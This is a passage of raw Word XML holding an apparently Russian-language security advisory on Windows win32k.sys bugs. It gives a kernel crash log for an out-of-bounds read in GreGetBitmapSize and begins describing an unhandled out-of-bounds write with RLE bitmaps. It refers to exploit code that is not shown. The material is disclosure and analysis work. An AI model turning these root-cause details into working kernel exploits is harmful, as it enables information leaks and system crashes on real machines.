        <w:t>Ошибку проще всего воспроизвести при включенных специальных пулах для win32k.sys, так как тогда недопустимое чтение памяти будет надежно обнаружено и выдаст системную проверку на ошибку. Ниже показана выдержка из журнала аварийного завершения работы ядра, вызванного рассматриваемой ошибкой:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CDD51B" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="00AE75AB" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE75AB">
        <w:t>DRIVER_PAGE_FAULT_BEYOND_END_OF_ALLOCATION (d6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38752E72" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="003741FC" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE75AB">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Было выделено </w:t>
      </w:r>
      <w:r>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> байт памяти, а ссылаются на более чем </w:t>
      </w:r>
      <w:r>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> байт.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0283A9C1" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="003741FC" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  Это не может быть защищено с помощью </w:t>
      </w:r>
      <w:r>
        <w:t>try</w:t>
      </w:r>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>except</w:t>
      </w:r>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1013F887" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="003741FC" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  Когда это возможно, имя виновного драйвера (строка </w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>) выводится на</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69321B59" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="003741FC" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  экране проверки ошибок и сохраняется в </w:t>
      </w:r>
      <w:r>
        <w:t>KiBugCheckDriver</w:t>
      </w:r>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4250210A" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="003741FC" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  Аргументы:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17105234" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="003741FC" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>Arg</w:t>
      </w:r>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">1: </w:t>
      </w:r>
      <w:r>
        <w:t>fe</w:t>
      </w:r>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>ff</w:t>
      </w:r>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>008, память, на которую ссылаются</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682E5900" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="003741FC" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>Arg</w:t>
      </w:r>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>2: 00000000, значение 0 = операция чтения, 1 = операция записи</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5519331C" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="003741FC" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>Arg</w:t>
      </w:r>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>3: 943587</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>1, если ненулевое значение, адрес, на который ссылается память.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CA9868" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="0075529D" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>Arg</w:t>
      </w:r>
      <w:r w:rsidRPr="0075529D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>4: 00000000, (зарезервировано).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7145A273" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="0075529D" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1775F95C" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="0075529D" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0075529D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  Подробности отладки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EC0156" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="0075529D" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0075529D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  ------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFBFB96" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="0075529D" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70EF7DEF" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="0075529D" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0075529D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  [...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBF2EDD" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="0075529D" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7775A3A2" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="0075529D" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0075529D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>TRAP</w:t>
      </w:r>
      <w:r w:rsidRPr="0075529D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:t>FRAME</w:t>
      </w:r>
      <w:r w:rsidRPr="0075529D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>: 92341</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidRPr="0075529D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="0075529D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> -- (.</w:t>
      </w:r>
      <w:r>
        <w:t>trap</w:t>
      </w:r>
      <w:r w:rsidRPr="0075529D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0</w:t>
      </w:r>
      <w:r>
        <w:t>xffffffffff</w:t>
      </w:r>
      <w:r w:rsidRPr="0075529D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>92341</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidRPr="0075529D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="0075529D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77136566" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="00AE75AB" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="0075529D">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE75AB">
        <w:t>ErrCode = 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E25FB75" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="00AE75AB" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="00AE75AB">
        <w:t xml:space="preserve">  eax=fe3fefe8 ebx=000000 ecx=000000 edx=00000028 esi=00000004 edi=01240000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522C85A7" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="00AE75AB" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="00AE75AB">
        <w:t xml:space="preserve">  eip=943587f1 esp=92341b90 ebp=92341b98 iopl=0 nv up ei pl zr na pe nc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111042D2" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="00AE75AB" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="00AE75AB">
        <w:t xml:space="preserve">  cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E01C06" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="00AE75AB" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="00AE75AB">
        <w:t xml:space="preserve">  win32k!GreGetBitmapSize+0x34:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9FF2B0" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="00AE75AB" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="00AE75AB">
        <w:t xml:space="preserve">  943587f1 8b7820 mov edi,dword ptr [eax+20h] ds:0023:fe3ff008=????????</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322E21FB" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="00AE75AB" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="00AE75AB">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>Сброс</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE75AB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>диапазона</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE75AB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>по</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE75AB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>умолчанию</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDA5E12" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="00AE75AB" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A57A1BF" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="00AE75AB" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="00AE75AB">
        <w:t xml:space="preserve">  LAST_CONTROL_TRANSFER: </w:t>
      </w:r>
      <w:r>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE75AB">
        <w:t xml:space="preserve"> 816f9dff </w:t>
      </w:r>
      <w:r>
        <w:t>на</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE75AB">
        <w:t xml:space="preserve"> 816959d8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE4E19E" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="00AE75AB" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DB0644F" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="00AE75AB">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">STACK_TEXT:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4304F27B" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="00AE75AB" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE75AB">
        <w:t>9234166c 816f9dff 00000003 09441320 00000065 nt!RtlpBreakWithStatusInstruction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD732F9" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="00AE75AB" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="00AE75AB">
        <w:t xml:space="preserve">  923416bc 816fa8fd 00000003 00000000 00000002 nt!KiBugCheckDebugBreak+0x1c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCB4F93" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="00AE75AB" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="00AE75AB">
        <w:t xml:space="preserve">  92341a80 816a899d 00000050 fe3ff008 00000000 nt!KeBugCheck2+0x68b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB8A16E" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="00AE75AB" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="00AE75AB">
        <w:t xml:space="preserve">  92341b04 8165af98 00000000 fe3ff008 00000000 nt!MmAccessFault+0x104</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6515C982" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="00AE75AB" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="00AE75AB">
        <w:t xml:space="preserve">  92341b04 943587f1 00000000 fe3ff008 00000000 nt!KiTrap0E+0xdc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE0642F" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRPr="00AE75AB" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="00AE75AB">
        <w:t xml:space="preserve">  92341b98 9434383e fe3fefe8 00000000 067f9cd5 win32k!GreGetBitmapSize+0x34</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E701E64" w14:textId="77777777" w:rsidR="00AE75AB" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="00AE75AB">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>92341c08 81657db6 00000000 00000001 00000000 win32k!NtGdiGetDIBitsInternal+0x17f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AF1B1E" w14:textId="416A62E9" w:rsidR="00AE75AB" w:rsidRPr="0075529D" w:rsidRDefault="00AE75AB" w:rsidP="00B71BBB">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE75AB">
        <w:t>92341c08 011d09e1 00000000 00000001 00000000 nt!KiSystemServicePostCall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060C9065" w14:textId="46659A0D" w:rsidR="00BE71E0" w:rsidRDefault="00AE75AB" w:rsidP="00BE71E0">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Данные за пределами границ, считанные GreGetBitmapSize(), могут быть извлечены обратно в пользовательский режим, что может помочь раскрыть конфиденциальные данные</w:t>
      </w:r>
      <w:r w:rsidR="002B3FB0">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BE71E0">
        <w:t xml:space="preserve"> Код эксплойта представлен в Приложении 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16033E68" w14:textId="63471192" w:rsidR="002B3FB0" w:rsidRDefault="002B3FB0" w:rsidP="002B3FB0">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>Необработанная запредельная запись в память пользовательского режима при запросе битовых карт с RLE-сжатием</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157DD029" w14:textId="1F004ED3" w:rsidR="002B3FB0" w:rsidRDefault="002B3FB0" w:rsidP="002B3FB0">
      <w:r>
        <w:t xml:space="preserve">5-й параметр системного вызова NtGdiGetDIBitsInternal </w:t>
      </w:r>
      <w:r w:rsidR="002B7772">
        <w:t>— это</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> указатель на выходной буфер, в который должны быть записаны данные растровой карты. Длина буфера указывается в 8-м параметре и может быть опционально равна 0. Логика блокировки области памяти показана ниже ("Buffer" </w:t>
      </w:r>
      <w:r w:rsidR="00D34695">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidR="00D34695">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">5-й аргумент, "Length" </w:t>
      </w:r>
      <w:r w:rsidR="00D34695">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidR="00D34695">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>8-й).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E879A53" w14:textId="77777777" w:rsidR="002B3FB0" w:rsidRPr="002B3FB0" w:rsidRDefault="002B3FB0" w:rsidP="00D34695">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34695">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="002B3FB0">
        <w:t>if (Length != 0 || (Length = GreGetBitmapSize(bmi)) != 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53382A02" w14:textId="77777777" w:rsidR="002B3FB0" w:rsidRPr="002B3FB0" w:rsidRDefault="002B3FB0" w:rsidP="00D34695">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="002B3FB0">
        <w:t xml:space="preserve">    ProbeForWrite(Buffer, Length, 4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB06FFC" w14:textId="03F6A307" w:rsidR="002B3FB0" w:rsidRPr="00D34695" w:rsidRDefault="002B3FB0" w:rsidP="00D34695">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="002B3FB0">
        <w:t xml:space="preserve">    MmSecureVirtualMemory(Buffer, Length, PAGE_READWRITE);</w:t>
      </w:r>
      <w:r w:rsidR="00D34695" w:rsidRPr="00D34695">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D34695" w:rsidRPr="00D34695">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>// secures a user-space memory address range so that it cannot be freed and its page protection cannot be made more restrictive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C4E78C" w14:textId="77777777" w:rsidR="002B3FB0" w:rsidRPr="00414CC1" w:rsidRDefault="002B3FB0" w:rsidP="00D34695">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3FB0">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00414CC1">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193F4D9C" w14:textId="3D231F5B" w:rsidR="002B3FB0" w:rsidRDefault="00F57CBB" w:rsidP="002B3FB0">
      <w:r>
        <w:t>Можно з</w:t>
      </w:r>
      <w:r w:rsidR="00E7154F">
        <w:t>а</w:t>
      </w:r>
      <w:r>
        <w:t>метить</w:t>
      </w:r>
      <w:r w:rsidR="002B3FB0">
        <w:t>, что если аргумент "Length" ненулевой, то он имеет приоритет над результатом GreGetBitmapSize() при определении того, сколько байт выходного буфера пользовательского режима должно быть зафиксировано в памяти как доступное для чтения/записи. Поскольку два вышеуказанных вызова должны гарантировать, что необходимая область памяти пользовательского режима будет доступна до тех пор, пока она не будет разблокирована, вызов функции GreGetDIBitsInternal(), которая фактически заполняет буфер данными, не защищается блоком try/except.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565E5DB2" w14:textId="77777777" w:rsidR="002B3FB0" w:rsidRDefault="002B3FB0" w:rsidP="002B3FB0">
      <w:r>
        <w:t xml:space="preserve">Однако, если мы посмотрим на GreGetDIBitsInternal() и далее на GreGetDIBitsInternalWorker(), то увидим, что если пользователь запрашивает битовую карту с RLE-сжатием (на что указывает bmi.biCompression, установленная в BI_RLE[4,8]), то внутренние процедуры EncodeRLE4() и EncodeRLE8() отвечают за запись выходных данных. Законный размер буфера передается через 5-й параметр функций (последний) и всегда устанавливается равным bmi.biSizeImage. Это создает несоответствие: разное </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>количество байт гарантированно присутствует в памяти (Length), и разное количество может быть реально записано в нее (bmi.biSizeImage). Из-за отсутствия обработки исключений в этой области кода, возникающее исключение вызывает общесистемную проверку на ошибку:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50528EB1" w14:textId="77777777" w:rsidR="002B3FB0" w:rsidRPr="002B3FB0" w:rsidRDefault="002B3FB0" w:rsidP="00031260">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="002B3FB0">
        <w:t>KERNEL_MODE_EXCEPTION_NOT_HANDLED (8e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D105FA1" w14:textId="6C45C2C3" w:rsidR="002B3FB0" w:rsidRPr="00031260" w:rsidRDefault="002B3FB0" w:rsidP="00031260">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3FB0">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="003741FC">
